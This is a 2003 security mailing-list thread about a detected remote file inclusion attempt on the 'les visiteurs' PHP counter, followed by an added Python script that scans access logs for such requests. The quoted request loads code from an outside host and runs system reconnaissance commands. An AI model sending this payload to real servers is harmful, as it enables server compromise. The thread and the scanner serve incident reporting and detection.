Message-ID: <000b01c3b836$02b07790$050010ac@Estila>
From: lorenzohgh at nsrg-security.com (Lorenzo Hernandez Garcia-Hierro)
Subject: file inclusion (les visiteurs)
Hi Daniel,
They are kiddies... :(
I was looking at the files and there are only high-risk-rated exploits
downloaded from packet storm, ptrace, etc.
And they are running remote php shells in their server.... xD
See you in the IRC tonight?
Best regards,
-------------------------------
0x00->Lorenzo Hernandez Garcia-Hierro
0x01->\x74\x72\x75\x6c\x75\x78
0x02->The truth is out there,
0x03-> outside your mind .
__________________________________
PGP: Keyfingerprint
4ACC D892 05F9 74F1 F453 7D62 6B4E B53E 9180 5F5B
ID: 0x91805F5B
**********************************
\x6e\x73\x72\x67
\x73\x65\x63\x75\x72\x69\x74\x79
\x72\x65\x73\x65\x61\x72\x63\x68
http://www.nsrg-security.com
______________________
----- Original Message -----
From: "Dan" <dan@...kedbox.net>
To: <full-disclosure@...ts.netsys.com>
Sent: Monday, December 01, 2003 6:02 PM
Subject: Re: [Full-Disclosure] file inclusion (les visiteurs)
> This is the same set of files that I noticed last week (xfteam.net) it seems
> they closed their domain down? (I cannot find it)
> Does anyone know if these ppl are a real sec organisation? or just some
> kiddies ?
>
> Cheers,
> Daniel.
>
> "Evert Daman" <evert@...ipix.org> wrote:
>
> >
> > last night snort detected this request:
> >
> > GET /counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid.org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls
> >
> >
> > because I patched 'les visiteurs' as described by 'matthieu peschaud'
> > on bugtraq on the 26 of october nothing happened, but it looks like someone
> > is trying to exploit this bug.
> > just want to mention it to this wonderful list :)
> >
> > kind regards,
> > Evert
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
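
The request quoted in this thread passes a remote URL in the `lvc_include_dir` parameter. The following is an added example, not part of the original messages: a small access-log scan that flags any request whose query parameter value is a remote URL, including the percent-encoded form. The log lines, client addresses and the host `remote.example` are constructed for illustration, and Common Log Format is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# A parameter value that points at a remote resource.
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
# Request field of a Common Log Format line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines, modelled on the request quoted in the thread.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Dec/2003:03:12:44 +0100] "GET /counter/include/'
    'new-visitor.inc.php?lvc_include_dir=http://remote.example/hax.gif?&cmd=id'
    ' HTTP/1.0" 200 512',
    '192.0.2.11 - - [01/Dec/2003:03:15:02 +0100] "GET /counter/include/'
    'new-visitor.inc.php?lvc_include_dir=http%3A%2F%2Fremote.example%2Fhax.gif%3F'
    ' HTTP/1.0" 200 512',
    '198.51.100.7 - - [01/Dec/2003:09:00:00 +0100] "GET /counter/index.php'
    '?page=stats HTTP/1.1" 200 2048',
]

def remote_include_params(target):
    """Return [(name, value)] for query parameters whose decoded value is a URL."""
    query = urlsplit(target).query
    # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
    return [(name, value)
            for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL.match(value.strip())]

def scan(lines):
    """Return (client, path, param, value) for every suspicious request."""
    findings = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue  # not a parseable request line
        target = m.group("target")
        for name, value in remote_include_params(target):
            findings.append((line.split()[0], urlsplit(target).path, name, value))
    return findings

if __name__ == "__main__":
    for client, path, name, value in scan(SAMPLE_LOG):
        print(f"{client} {path} {name}={value}")
```

Legitimate redirect or callback parameters also carry URLs, so in practice the findings are filtered by script path or parameter name before alerting.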